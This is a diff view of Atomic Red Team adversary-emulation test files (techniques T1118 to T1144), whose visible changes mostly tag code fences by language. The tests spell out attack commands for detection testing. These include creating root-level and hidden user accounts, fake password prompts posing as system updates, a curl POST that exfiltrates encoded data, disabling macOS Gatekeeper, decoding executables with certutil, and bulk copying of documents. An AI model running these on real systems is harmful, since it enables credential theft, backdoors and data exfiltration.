if (Test-Path "#{test_harness}") {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```
```powershell
New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null
Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1118/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}"
```
@@ -547,7 +568,9 @@ Executes an InstallUtil assembly by renaming InstallUtil.exe and using a nonstan
#### Attack Commands: Run with `powershell`!
```
```powershell
# Import the required test harness function, Invoke-BuildAndInvokeInstallUtilAssembly
. #{test_harness}
@@ -583,7 +606,7 @@ Actual: $ActualOutput
```
#### Cleanup Commands:
```
```powershell
Remove-Item -Path "$Env:windir\System32\Tasks\readme.txt"
Remove-Item -Path "$Env:windir\System32\Tasks\readme.InstallLog"
Remove-Item -Path "$Env:windir\System32\Tasks\readme.InstallState"
@@ -591,14 +614,15 @@ Remove-Item -Path "$Env:windir\System32\Tasks\notepad.exe"
```
#### Dependencies: Run with `powershell`!
##### Description: InstallUtil test harness script must be installed at specified location (#{test_harness})
##### Check Prereq Commands:
```
```powershell
if (Test-Path "#{test_harness}") {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```
```powershell
New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null
Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1118/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}"
```
atomics/T1119/T1119.md
+14 -6
View File
@@ -25,7 +25,9 @@ Automated Collection
#### Attack Commands: Run with `command_prompt`!
```
```cmd
dir c: /b /s .docx | findstr /e .docx
for /R c: %f in (*.docx) do copy %f c:\temp\
```
@@ -46,7 +48,9 @@ Automated Collection
#### Attack Commands: Run with `powershell`!
```
```powershell
Get-ChildItem -Recurse -Include *.doc | % {Copy-Item $_.FullName -destination c:\temp}
```
@@ -66,14 +70,16 @@ collect information for exfiltration
#### Attack Commands: Run with `powershell`!
```
```powershell
Get-Service > $env:TEMP\T1119_1.txt
Get-ChildItem Env: > $env:TEMP\T1119_2.txt
Get-Process > $env:TEMP\T1119_3.txt
```
#### Cleanup Commands:
```
```powershell
Remove-Item $env:TEMP\T1119_1.txt -ErrorAction Ignore
Remove-Item $env:TEMP\T1119_2.txt -ErrorAction Ignore
Remove-Item $env:TEMP\T1119_3.txt -ErrorAction Ignore
@@ -94,7 +100,9 @@ collect information for exfiltration
#### Attack Commands: Run with `command_prompt`!
```
```cmd
sc query type=service > %TEMP%\T1119_1.txt
doskey /history > %TEMP%\T1119_2.txt
wmic process list > %TEMP%\T1119_3.txt
@@ -102,7 +110,7 @@ tree C:\AtomicRedTeam\atomics > %TEMP%\T1119_4.txt
```
#### Cleanup Commands:
```
```cmd
del %TEMP%\T1119_1.txt >nul 2>&1
del %TEMP%\T1119_2.txt >nul 2>&1
del %TEMP%\T1119_3.txt >nul 2>&1
atomics/T1121/T1121.md
+10 -6
View File
@@ -27,25 +27,27 @@ Executes the Uninstall Method, No Admin Rights Required
#### Attack Commands: Run with `command_prompt`!
```
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /out:"#{output_file}" /target:library #{source_file}
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U #{output_file}
```
#### Cleanup Commands:
```
```cmd
del #{output_file} >nul 2>&1
```
#### Dependencies: Run with `powershell`!
##### Description: The CSharp source file must exist on disk at specified location (#{source_file})
##### Check Prereq Commands:
```
```powershell
if (Test-Path #{source_file}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```
```powershell
New-Item -Type Directory (split-path #{source_file}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1121/src/T1121.cs" -OutFile "#{source_file}"
```
@@ -69,6 +71,7 @@ Executes the Uninstall Method, No Admin Rights Required, Requires SNK
| source_file | Location of the CSharp source_file | Path | PathToAtomicsFolder\T1121\src\T1121.cs|
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```
$key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4='
@@ -79,7 +82,7 @@ C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe #{output_file}
```
#### Cleanup Commands:
```
```powershell
Remove-Item #{output_file} -ErrorAction Ignore | Out-Null
$parentpath = Split-Path -Path "#{output_file}"
Remove-Item $parentpath\key.snk -ErrorAction Ignore | Out-Null
@@ -87,14 +90,15 @@ Remove-Item $parentpath\T1121.tlb -ErrorAction Ignore | Out-Null
```
#### Dependencies: Run with `powershell`!
##### Description: The CSharp source file must exist on disk at specified location (#{source_file})
##### Check Prereq Commands:
```
```powershell
if (Test-Path #{source_file}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```
```powershell
New-Item -Type Directory (split-path #{source_file}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1121/src/T1121.cs" -OutFile "#{source_file}"
```
atomics/T1123/T1123.md
+3 -1
View File
@@ -19,7 +19,9 @@ Malware or scripts may be used to interact with the devices through an available
#### Attack Commands: Run with `powershell`!
```
```powershell
powershell.exe -Command WindowsAudioDevice-Powershell-Cmdlet
```
atomics/T1124/T1124.md
+6 -2
View File
@@ -26,7 +26,9 @@ Identify the system time
#### Attack Commands: Run with `command_prompt`!
```
```cmd
net time \\#{computer_name}
w32tm /tz
```
@@ -47,7 +49,9 @@ Identify the system time via PowerShell
#### Attack Commands: Run with `powershell`!
```
```powershell
Get-Date
```
atomics/T1126/T1126.md
+9 -3
View File
@@ -28,7 +28,9 @@ Add a Network Share utilizing the command_prompt
#### Attack Commands: Run with `command_prompt`!
```
```cmd
net use c: #{share_name}
net share test=#{share_name} /REMARK:"test share" /CACHE:No
```
@@ -54,7 +56,9 @@ Removes a Network Share utilizing the command_prompt
#### Attack Commands: Run with `command_prompt`!
```
```cmd
net share #{share_name} /delete
```
@@ -79,7 +83,9 @@ Removes a Network Share utilizing PowerShell
#### Attack Commands: Run with `powershell`!
```
```powershell
Remove-SmbShare -Name #{share_name}
Remove-FileShare -Name #{share_name}
```
atomics/T1127/T1127.md
+6 -3
View File
@@ -54,20 +54,23 @@ Executes the code in a project file using. C# Example
#### Attack Commands: Run with `command_prompt`!
```
```cmd
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe #{filename}
```
#### Dependencies: Run with `powershell`!
##### Description: Project file must exist on disk at specified location (#{filename})
##### Check Prereq Commands:
```
```powershell
if (Test-Path #{filename}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```
```powershell
New-Item -Type Directory (split-path #{filename}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1127/src/T1127.csproj" -OutFile "#{filename}"
```
atomics/T1128/T1128.md
+3 -1
View File
@@ -26,7 +26,9 @@ Netsh interacts with other operating system components using dynamic-link librar
#### Attack Commands: Run with `command_prompt`!
```
```cmd
netsh.exe add helper #{helper_file}
```
atomics/T1130/T1130.md
+3 -1
View File
@@ -31,7 +31,9 @@ Creates a root CA with openssl
#### Attack Commands: Run with `sh`!
```
```sh
openssl genrsa -out #{key_filename} 4096
openssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -out #{cert_filename}
atomics/T1132/T1132.md
+3 -1
View File
@@ -23,7 +23,9 @@ Utilizing a common technique for posting base64 encoded data.
#### Attack Commands: Run with `sh`!
```
```sh
echo -n 111-11-1111 | base64
curl -XPOST #{base64_data}.#{destination_url}
```
atomics/T1134/T1134.md
+3 -1
View File
@@ -37,7 +37,9 @@ Requires Administrator Privileges To Execute Test
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```
```powershell
#list processes by user,
$owners = @{}
gwmi win32_process |% {$owners[$_.handle] = $_.getowner().user}
atomics/T1135/T1135.md
+12 -4
View File
@@ -44,7 +44,9 @@ Network Share Discovery
#### Attack Commands: Run with `sh`!
```
```sh
df -aH
smbutil view -g //#{computer_name}
showmount #{computer_name}
@@ -71,7 +73,9 @@ Network Share Discovery utilizing the command prompt
#### Attack Commands: Run with `command_prompt`!
```
```cmd
net view \\#{computer_name}
```
@@ -96,7 +100,9 @@ Network Share Discovery utilizing PowerShell
#### Attack Commands: Run with `powershell`!
```
```powershell
net view \\#{computer_name}
get-smbshare -Name #{computer_name}
```
@@ -116,7 +122,9 @@ View information about all of the resources that are shared on the local compute
#### Attack Commands: Run with `command_prompt`!
```
```cmd
net share
```
atomics/T1136/T1136.md
+20 -10
View File
@@ -41,12 +41,14 @@ Create a user via useradd
#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin)
```
```bash
useradd -M -N -r -s /bin/bash -c evil_account #{username}
```
#### Cleanup Commands:
```
```bash
userdel #{username}
```
@@ -71,7 +73,9 @@ Creates a user on a MacOS system with dscl
#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin)
```
```bash
dscl . -create /Users/#{username}
dscl . -create /Users/#{username} UserShell /bin/bash
dscl . -create /Users/#{username} RealName "#{realname}"
@@ -81,7 +85,7 @@ dscl . -create /Users/#{username} NFSHomeDirectory /Users/#{username}
```
#### Cleanup Commands:
```
```bash
dscl . -delete /Users/#{username}
```
@@ -106,12 +110,14 @@ Creates a new user in a command prompt
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
```cmd
net user /add "#{username}" "#{password}"
```
#### Cleanup Commands:
```
```cmd
net user /del "#{username}"
```
@@ -135,12 +141,14 @@ Creates a new user in PowerShell
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```
```powershell
New-LocalUser -Name "#{username}" -NoPassword
```
#### Cleanup Commands:
```
```powershell
Remove-LocalUser -Name "#{username}" -ErrorAction Ignore
```
@@ -165,13 +173,15 @@ Creates a new user in Linux and adds the user to the `root` group. This techniqu
#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin)
```
```bash
useradd -o -u 0 -g 0 -M -d /root -s /bin/bash #{username}
echo "#{password}" | passwd --stdin #{username}
```
#### Cleanup Commands:
```
```bash
userdel #{username}
```
atomics/T1138/T1138.md
+14 -7
View File
@@ -42,21 +42,24 @@ place to start.
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
```cmd
sdbinst.exe #{file_path}
sdbinst.exe -u #{file_path}
```
#### Dependencies: Run with `powershell`!
##### Description: Shim database file must exist on disk at specified location (#{file_path})
##### Check Prereq Commands:
```
```powershell
if (Test-Path #{file_path}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```
```powershell
New-Item -Type Directory (split-path #{file_path}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1138/src/AtomicShimx86.sdb" -OutFile "#{file_path}"
```
@@ -75,13 +78,15 @@ https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persist
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```
```powershell
Copy-Item $PathToAtomicsFolder\T1138\bin\T1138CompatDatabase.sdb C:\Windows\apppatch\Custom\T1138CompatDatabase.sdb
Copy-Item $PathToAtomicsFolder\T1138\bin\T1138CompatDatabase.sdb C:\Windows\apppatch\Custom\Custom64\T1138CompatDatabase.sdb
```
#### Cleanup Commands:
```
```powershell
Remove-Item C:\Windows\apppatch\Custom\T1138CompatDatabase.sdb -ErrorAction Ignore
Remove-Item C:\Windows\apppatch\Custom\Custom64\T1138CompatDatabase.sdb -ErrorAction Ignore
```
@@ -101,13 +106,15 @@ https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persist
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```
```powershell
New-ItemProperty -Path HKLM:"\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom" -Name "AtomicRedTeamT1138" -Value "AtomicRedTeamT1138"
New-ItemProperty -Path HKLM:"\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\InstalledSDB" -Name "AtomicRedTeamT1138" -Value "AtomicRedTeamT1138"
```
#### Cleanup Commands:
```
```powershell
Remove-ItemProperty -Path HKLM:"\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom" -Name "AtomicRedTeamT1138" -ErrorAction Ignore
Remove-ItemProperty -Path HKLM:"\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\InstalledSDB" -Name "AtomicRedTeamT1138" -ErrorAction Ignore
```
atomics/T1139/T1139.md
+3 -1
View File
@@ -24,7 +24,9 @@ Search through bash history for specifice commands we want to capture
#### Attack Commands: Run with `sh`!
```
```sh
cat #{bash_history_filename} | grep #{bash_history_grep_args} > #{output_file}
```
atomics/T1140/T1140.md
+8 -4
View File
@@ -30,13 +30,15 @@ Encode/Decode executable
#### Attack Commands: Run with `command_prompt`!
```
```cmd
certutil -encode #{executable} %temp%\T1140_calc.txt
certutil -decode %temp%\T1140_calc.txt %temp%T1140_calc_decoded.exe
```
#### Cleanup Commands:
```
```cmd
del %temp%\T1140_calc.txt >nul 2>&1
del %temp%T1140_calc_decoded.exe >nul 2>&1
```
@@ -61,13 +63,15 @@ Rename certutil and decode a file. This is in reference to latest research by Fi
#### Attack Commands: Run with `command_prompt`!
```
```cmd
copy %windir%\system32\certutil.exe %temp%\tcm.tmp
%temp%\tcm.tmp -decode #{executable} %temp%\T1140.txt
```
#### Cleanup Commands:
```
```cmd
del %temp%\tcm.tmp >nul 2>&1
del %temp%\T1140.txt >nul 2>&1
```
atomics/T1141/T1141.md
+6 -2
View File
@@ -22,7 +22,9 @@ Reference: http://fuzzynop.blogspot.com/2014/10/osascript-for-local-phishing.htm
#### Attack Commands: Run with `sh`!
```
```sh
osascript -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to display dialog "Software Update requires that you type your password to apply changes." & return & return default answer "" with icon 1 with hidden answer with title "Software Update"'
```
@@ -44,7 +46,9 @@ Reference: https://github.com/nathanlopez/Stitch/blob/master/PyLib/askpass.py
#### Attack Commands: Run with `powershell`!
```
```powershell
# Creates GUI to prompt for password. Expect long pause before prompt is available.
$cred = $host.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName)
# Using write-warning to allow message to show on console as echo and other similar commands are not visable from the Invoke-AtomicTest framework.
atomics/T1142/T1142.md
+3 -1
View File
@@ -29,7 +29,9 @@ To manage their credentials, users have to use additional credentials to access
#### Attack Commands: Run with `sh`!
```
```sh
security -h
security find-certificate -a -p > allcerts.pem
security import /tmp/certs.pem -k
atomics/T1143/T1143.md
+3 -1
View File
@@ -30,7 +30,9 @@ Launch PowerShell with the "-WindowStyle Hidden" argument to conceal PowerShell
#### Attack Commands: Run with `powershell`!
```
```powershell
Start-Process #{powershell_command}
```
atomics/T1144/T1144.md
+3 -1
View File
@@ -26,7 +26,9 @@ Gatekeeper Bypass via command line
#### Attack Commands: Run with `sh`!
```
```sh
sudo xattr -r -d com.apple.quarantine #{app_path}
sudo spctl --master-disable
```

Some files were not shown because too many files have changed in this diff Show More